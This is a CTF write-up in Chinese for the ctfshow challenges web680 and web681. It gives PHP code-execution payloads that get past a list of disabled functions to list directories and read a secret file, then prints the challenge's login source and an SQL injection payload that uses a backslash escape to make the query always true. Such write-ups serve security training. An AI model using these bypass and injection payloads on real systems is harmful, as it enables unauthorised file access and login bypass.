web680

image-20220415184940885

image-20220415200517421

看看还剩啥

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,fopen,file_get_contents,fread,file,readfile,opendir,readdir,closedir,rewinddir
code=print_r(scandir('./'));

image-20220415200647646

code=highlight_file("secret_you_never_know");

image-20220415200719749

code=var_dump(scandir("."));
code=$a=new DirectoryIterator('glob:///var/www/html/*');foreach($a as $f){echo($f->__toString()." ");}

RCE总结

web681

不能扫目录,我们看看字典里有没有,就直接访问了

image-20220415203154362

image-20220415203139503

check.php

<?php

/*
# -*- coding: utf-8 -*-
 Author: h1xa
 Date:   2021-09-24 14:58:16
 Last Modified by:   h1xa
 Last Modified time: 2021-09-24 16:04:49
 email: h1xa@ctfer.com
 link: https://ctfer.com

*/

error_reporting(0);
include "common.php";

session_start();

if (isset($_POST["name"])){
  $name = str_replace("'", "", trim(waf($_POST["name"])));
  if (strlen($name) > 11){
    echo("<script>alert('name too long')</script>");
  }else{
    $sql = "select count(*) from ctfshow_users where username = '$name' or nickname = '$name'";
    echo $sql;
    $db = new db();
    $result = $db->select_one_array($sql);
    if ($result[0]){
      $_SESSION['hat'] = 'black';
      echo 'good job';
    }else{
    $_SESSION['hat'] = 'green';
    }
    header("Location: index.php");
  }

}


select count(*) from ctfshow_users where username = 'or/**/(1)#\' or nickname = 'or/**/(1)#\'

我们添加了\就会把’进行转义

or/**/(1)#\' or nickname =

查询语句就会变成

select count(*) from ctfshow_users where username = 'xxx'or/**/(1)#\'

image-20220416180738970